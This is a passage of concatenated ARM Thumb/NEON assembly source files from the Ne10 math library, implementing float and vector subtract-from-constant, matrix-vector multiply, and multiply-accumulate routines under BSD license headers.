add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i]
vmov s3, r2 @ Get cst into register s3
vsub.f32 s10, s3, s1 @ s10 = cst - src[i]
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_rsbc_vec2f_asm
.thumb
.thumb_func
ne10_rsbc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_rsbc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x and src[i].y
vldr s2, [r6, #4]
vldr s3, [r2, #0] @ Load cst->x and cst->y
vldr s4, [r2, #4]
vsub.f32 s10, s3, s1 @ s10 = cst->x - src[i].x
vsub.f32 s11, s4, s2 @ s11 = cst->y - src[i].y
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_rsbc_vec3f_asm
.thumb
.thumb_func
ne10_rsbc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_rsbc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , and src[i].z
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r2, #0] @ Load cst->x, cst->y, and cst->z
vldr s5, [r2, #4]
vldr s6, [r2, #8]
vsub.f32 s10, s4, s1 @ s10 = cst->x - src[i].x
vsub.f32 s11, s5, s2 @ s11 = cst->y - src[i].y
vsub.f32 s12, s6, s3 @ s12 = cst->z - src[i].z
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) @@ (for x, y, and z)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_rsbc_vec4f_asm
.thumb
.thumb_func
ne10_rsbc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_rsbc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , src[i].z, and w
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r6, #12]
vldr s5, [r2, #0] @ Load cst->x, cst->y, cst->z, and w
vldr s6, [r2, #4]
vldr s7, [r2, #8]
vldr s8, [r2, #12]
vsub.f32 s10, s5, s1 @ s10 = cst->x - src[i].x
vsub.f32 s11, s6, s2 @ s11 = cst->y - src[i].y
vsub.f32 s12, s7, s3 @ s12 = cst->z - src[i].z
vsub.f32 s13, s8, s4 @ s13 = cst->w - src[i].w
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
vstr s13, [r7, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) @@ (for x, y, z, and w)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 16,927 | modules/math/NE10_mulcmatvec.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulcmatvec.neon.s
@
.text
.syntax unified
.include "NE10header.s"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro multiplies a single 2x2 matrix by eight vec2's
@ The elements of the vectors are loaded into registers q8-q11
@ by the caller (ne10_mulcmatvec_cm2x2f_v2f_neon) in the following
@ order:
@
@ d16=(x1,x3) d18=(y1,y3) d20=(x2,x4) d22=(y2,y4);
@ d17=(x5,x7) d19=(y5,y7) d21=(x6,x8) d23=(y6,y8);
@
@ This macro multiplies these eight vectors by the 2x2 matrix
@ which is stored in registers d0[0],d1[0],d2[0], and d3[0].
@ The resulting eight vectors are returned in q12-q15
@ in the same order as shown above.
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MUL_MAT2x2_VEC2
vmul.f32 q10, q8 , d0[0] @ a*x1,x2,x3,x4
vmul.f32 q8 , q8 , d1[0] @ b*x1,x2,x3,x4
vmul.f32 q11, q9 , d2[0] @ c*y1,y2,y3,y4
vmul.f32 q9 , q9 , d3[0] @ d*y1,y2,y3,y4
vadd.f32 q12, q10, q11 @ 3) res24.x = a*(x1,x2,x3,x4) + c*(y1,y2,y3,y4) @ These results need to be stored in the order noted
vadd.f32 q13, q8, q9 @ 4) res24.y = b*(x1,x2,x3,x4) + d*(y1,y2,y3,y4)
.endm
.balign 4
.global ne10_mulcmatvec_cm2x2f_v2f_neon
.thumb
.thumb_func
ne10_mulcmatvec_cm2x2f_v2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulcmatvec_cm2x2f_v2f ( arm_vec2f_t * dst,
@ const arm_mat2x2f_t * cst,
@ arm_vec2f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ (this register is updated and mvoed to the next entry
@ after every store operation)
@ r1: *cst, memory pointer to where the constant matrix is kept
@ r2: *src & current src entry's address
@ r3: int count & the number of items in the input array
@
@ r4: the number of items that are left to be processed at the
@ end of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r3; This is what's left to be processed after this loop
@ First we load the constant 2x2 matrix, then each time we load
@ eight vectors of 2-floats, multiply each vector with the matrix,
@ finally store the resutlting vectors in the destination memory
@ address, and move on to the next four vectors.
@ load the constant matrix
@ d0 = m11(a) d2 = m12(c)
@ d1 = m21(b) d3 = m22(d)
vld4.32 { d0[0], d1[0], d2[0], d3[0] }, [r1]
cmp r3, #0
beq .L_check_mat2x2
@ load the 1st set of values
@ if {V1, V2, V3, V4} are 4 vec2's in memory
@ then after the load operations the 4 vectors
@ are stored in registers q8-q9 like so:
@
@ q8=(x1,x2,x3,x4)
@ q9=(y1,y2,y3,y4)
vld2.32 { d16, d17, d18, d19 }, [r2]!
subs r3, r3, #4 @ 8 for this set
@ calculate values for the 1st set
MUL_MAT2x2_VEC2
ble .L_mainloopend_mat2x2
.L_mainloop_mat2x2:
@ store the result for the current set
vst2.32 { d24, d25, d26, d27 }, [r0]!
@ load the next set of values
vld2.32 { d16, d17, d18, d19 }, [r2]!
subs r3, r3, #4
@ calculate values for the next set
MUL_MAT2x2_VEC2
bgt .L_mainloop_mat2x2 @ loop if r2 is > r3, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_mat2x2:
@ the last iteration for this call
@ store the result for the last set
vst2.32 { d24, d25, d26, d27 }, [r0]!
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items left in the input array
vld2.32 { d16[0], d18[0] }, [r2]!
subs r4, r4, #1
@ calculate values
MUL_MAT2x2_VEC2
@ store the results
vst2.32 { d24[0], d26[0] }, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return
pop {r4}
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to load four vec3's into registers q8-q10
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_FOUR_VEC3
vld3.32 { d16, d18, d20 }, [r2]!
vld3.32 { d17, d19, d21 }, [r2]!
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro multiplies the constant 3x3 matrix loaded into
@ registers d0-d5 by four vec3's that the above macro LOAD_FOUR_VEC3
@ loads. The resuls are returned in registers q11, q12, and and q13
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MUL_MAT3x3_VEC3
vmul.f32 q11, q8 , d0[0]
vmla.f32 q11, q9 , d0[1]
vmla.f32 q11, q10, d1[0]
vmul.f32 q12, q8 , d2[0]
vmla.f32 q12, q9 , d2[1]
vmla.f32 q12, q10, d3[0]
vmul.f32 q13, q8 , d4[0]
vmla.f32 q13, q9 , d4[1]
vmla.f32 q13, q10, d5[0]
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to store the resulting vec3's that were returned in
@ registers q11 to q13 in the above macro MUL_MAT3x3_VEC3.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_FOUR_VEC3
vst3.32 { d22, d24, d26 }, [r0]!
vst3.32 { d23, d25, d27 }, [r0]!
.endm
.align 2
.global ne10_mulcmatvec_cm3x3f_v3f_neon
.thumb
.thumb_func
ne10_mulcmatvec_cm3x3f_v3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulcmatvec_cm3x3f_v3f ( arm_vec3f_t * dst,
@ const arm_mat3x3f_t * cst,
@ arm_vec3f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ (this register is updated and mvoed to the next entry
@ after every store operation)
@ r1: *cst, memory pointer to where the constant matrix is kep
@ r2: *src & current src entry's gddress
@ r3: int count & the number of items in the input array
@
@ r4: the number of items that are left to be processed at the
@ end of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push { r4 }
and r4, r3, #3 @ r3 = count % 4;
sub r3, r3, r4 @ count = count - r3; This is what's left to be processed after this loop
@ First we load the constant 3x3 matrix, then each time we load
@ four vectors of 3-floats, multiply each vector with the matrix,
@ finally store the resutlting vectors in the destination memory
@ address, and move on to the next four vectors.
@ load the constant matrix into q0-q2
vld3.32 { d0 , d2 , d4 }, [r1]!
vld3.32 { d1[0], d3[0], d5[0] }, [r1]
cmp r3, #0
beq .L_check_mat3x3
@ load the 1st set of values
LOAD_FOUR_VEC3
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
MUL_MAT3x3_VEC3
ble .L_mainloopend_mat3x3
.L_mainloop_mat3x3:
@ store the result for the current set
STORE_FOUR_VEC3
@ load the next set of values
LOAD_FOUR_VEC3
subs r3, r3, #4
@ calculate values for the next set
MUL_MAT3x3_VEC3
bgt .L_mainloop_mat3x3 @ loop if r2 is > r3, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_mat3x3:
@ the last iteration for this call
@ store the result for the last set
STORE_FOUR_VEC3
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items left in the input array
vld3.32 { d16[0], d18[0], d20[0] }, [r2]!
subs r4, r4, #1
MUL_MAT3x3_VEC3
vst3.32 { d22[0], d24[0], d26[0] }, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return
pop { r4 }
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to load four vec4's into registers q8-q11.
@ This macro uses r2 (the thirs parameter in
@ ne10_mulcmatvec_cm4x4f_v4f_neon) as the address register.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_FOUR_VEC4
vld4.32 { d16, d18, d20, d22 }, [r2]!
vld4.32 { d17, d19, d21, d23 }, [r2]!
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro multiplies the constant 4x4 matrix that is loaded
@ in ne10_mulcmatvec_cm4x4f_v4f_neon by four vec4's that are loaded in
@ the above macro LOAD_FOUR_VEC4.
@ The resulting four vectors are returned in registers q12 to q15.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MUL_MAT4x4_VEC4
vmul.f32 q12, q8 , d0[0]
vmla.f32 q12, q9 , d0[1]
vmla.f32 q12, q10, d1[0]
vmla.f32 q12, q11, d1[1]
vmul.f32 q13, q8 , d2[0]
vmla.f32 q13, q9 , d2[1]
vmla.f32 q13, q10, d3[0]
vmla.f32 q13, q11, d3[1]
vmul.f32 q14, q8 , d4[0]
vmla.f32 q14, q9 , d4[1]
vmla.f32 q14, q10, d5[0]
vmla.f32 q14, q11, d5[1]
vmul.f32 q15, q8 , d6[0]
vmla.f32 q15, q9 , d6[1]
vmla.f32 q15, q10, d7[0]
vmla.f32 q15, q11, d7[1]
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores the results from the above macro MUL_MAT4x4_VEC4
@ from registers q12-q15 in to the destination memory (r0) which is
@ the first parameter of ne10_mulcmatvec_cm4x4f_v4f_neon().
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_FOUR_VEC4
vst4.32 { d24, d26, d28, d30 }, [r0]!
vst4.32 { d25, d27, d29, d31 }, [r0]!
.endm
.align 2
.global ne10_mulcmatvec_cm4x4f_v4f_neon
.thumb
.thumb_func
ne10_mulcmatvec_cm4x4f_v4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulcmatvec_cm4x4f_v4f ( arm_vec4f_t * dst,
@ const arm_mat4x4f_t * cst,
@ arm_vec4f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ (this register is updated and mvoed to the next entry
@ after every store operation)
@ r1: *cst, pointer to memory where the constant matrix is kept
@ r2: *src & current src entry's address
@ r3: int count & the number of items in the input array
@
@ r4: the number of items that are left to be processed at the
@ end of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
@ First we load the constant 4x4 matrix, then each time we load
@ four vectors of 4-floats, multiply each vector with the matrix,
@ finally store the resutlting vectors in the destination memory
@ address, and move on to the next four vectors.
@ load the constant matrix into q0-q3
vld4.32 { d0, d2, d4, d6 }, [r1]!
vld4.32 { d1, d3, d5, d7 }, [r1]
cmp r3, #0
beq .L_check_mat4x4
@ load the 1st set of values
LOAD_FOUR_VEC4
subs r3, r3, #4
@ calculate values for the 1st set
MUL_MAT4x4_VEC4
ble .L_mainloopend_mat4x4
.L_mainloop_mat4x4:
@ store the result for the current set
STORE_FOUR_VEC4
@ load the next set of values
LOAD_FOUR_VEC4
subs r3, r3, #4
@ calculate values for the next set
MUL_MAT4x4_VEC4
bgt .L_mainloop_mat4x4 @ loop if r2 is > r3, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_mat4x4:
@ the last iteration for this call
@ store the result for the last set
STORE_FOUR_VEC4
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array
vld4.32 { d16[0], d18[0], d20[0], d22[0] }, [r2]!
subs r4, r4, #1
@ calculate values
MUL_MAT4x4_VEC4
@ store the results
vst4.32 { d24[0], d26[0], d28[0], d30[0] }, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 11,477 | modules/math/NE10_mlac.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mlac.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mlac_float_asm
.thumb
.thumb_func
ne10_mlac_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mlac_float(arm_vec2f_t * dst, arm_vec2f_t * acc,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *acc
@ r2: *src
@ r3: cst
@ r4: int count
@
@ r4: loop counter
@ r5: current item's offset in acc[], src[], and dst[]
@ r6: current accumulator item's address made of base(r1)+offset(r5)
@ r7: current source item's address made of base(r2)+offset(r5)
@ r8: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7, r8}
ldr r4, [r13, #20] @ r4 = cst ( off the stack pointer (sp) - which is r13 )
cbz r4, .LoopEndFloat
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current accumulator item's address in memory
vldr s10, [r6, #0] @ Load acc[i]
add r7, r2, r5 @ Get current source item's address in memory
vldr s2, [r7, #0] @ Load src[i]
vmov s3, r3 @ Get cst into register s3
vmla.f32 s10, s2, s3 @ s10 = acc[i] + ( src[i] * cst )
add r8, r0, r5 @ Get current destination item's address in memory
vstr s10, [r8, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float) @@ (for x and y)
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7, r8}
bx lr
.balign 4
.global ne10_mlac_vec2f_asm
.thumb
.thumb_func
ne10_mlac_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mlac_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *acc
@ r2: *src
@ r3: *cst
@ r4: int count
@
@ r4: loop counter
@ r5: current item's offset in acc[], src[], and dst[]
@ r6: current accumulator item's address made of base(r1)+offset(r5)
@ r7: current source item's address made of base(r2)+offset(r5)
@ r8: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7, r8}
ldr r4, [r13, #20] @ r4 = cst ( off the stack pointer (sp) - which is r13 )
cbz r4, .LoopEndVec2F
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current accumulator item's address in memory
vldr s10, [r6, #0] @ Load acc[i].x and acc[i].y
vldr s11, [r6, #4]
add r7, r2, r5 @ Get current source item's address in memory
vldr s1, [r7, #0] @ Load src[i].x and src[i].y
vldr s2, [r7, #4]
vldr s3, [r3, #0] @ Load cst->x and cst->y
vldr s4, [r3, #4]
vmla.f32 s10, s1, s3 @ s10 = acc[i].x + ( src[i].x * cst->x )
vmla.f32 s11, s2, s4
add r8, r0, r5 @ Get current destination item's address in memory
vstr s10, [r8, #0] @ Store the results back into the main memory
vstr s11, [r8, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) @@ (for x and y)
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7, r8}
bx lr
.balign 4
.global ne10_mlac_vec3f_asm
.thumb
.thumb_func
ne10_mlac_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mlac_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *acc
@ r2: *src
@ r3: *cst
@ r4: int count
@
@ r4: loop counter
@ r5: current item's offset in acc[], src[], and dst[]
@ r6: current accumulator item's address made of base(r1)+offset(r5)
@ r7: current source item's address made of base(r2)+offset(r5)
@ r8: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7, r8}
ldr r4, [r13, #20] @ r4 = cst ( off the stack pointer (sp) - which is r13 )
cbz r4, .LoopEndVec3F
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current accumulator item's address in memory
vldr s10, [r6, #0] @ Load acc[i].x, acc[i].y , and acc[i].z
vldr s11, [r6, #4]
vldr s12, [r6, #8]
add r7, r2, r5 @ Get current source item's address in memory
vldr s1, [r7, #0] @ Load src[i].x, src[i].y , and src[i].z
vldr s2, [r7, #4]
vldr s3, [r7, #8]
vldr s4, [r3, #0] @ Load cst->x, cst->y, and cst->z
vldr s5, [r3, #4]
vldr s6, [r3, #8]
vmla.f32 s10, s1, s4 @ s10 = acc[i].x + ( src[i].x * cst->x )
vmla.f32 s11, s2, s5 @ same for 'y'
vmla.f32 s12, s3, s6 @ same for 'z'
add r8, r0, r5 @ Get current destination item's address in memory
vstr s10, [r8, #0] @ Store the results back into the main memory
vstr s11, [r8, #4]
vstr s12, [r8, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) @@ (for x, y, and z)
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7, r8}
bx lr
.balign 4
.global ne10_mlac_vec4f_asm
.thumb
.thumb_func
ne10_mlac_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mlac_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *acc
@ r2: *src
@ r3: *cst
@ r4: int count
@
@ r4: loop counter
@ r5: current item's offset in acc[], src[], and dst[]
@ r6: current accumulator item's address made of base(r1)+offset(r5)
@ r7: current source item's address made of base(r2)+offset(r5)
@ r8: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7, r8}
ldr r4, [r13, #20] @ r4 = cst ( off the stack pointer (sp) - which is r13 )
cbz r4, .LoopEndVec4F
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current accumulator item's address in memory
vldr s10, [r6, #0] @ Load acc[i].x, acc[i].y , acc[i].z, and w
vldr s11, [r6, #4]
vldr s12, [r6, #8]
vldr s13, [r6, #12]
add r7, r2, r5 @ Get current source item's address in memory
vldr s1, [r7, #0] @ Load src[i].x, src[i].y , src[i].z, and w
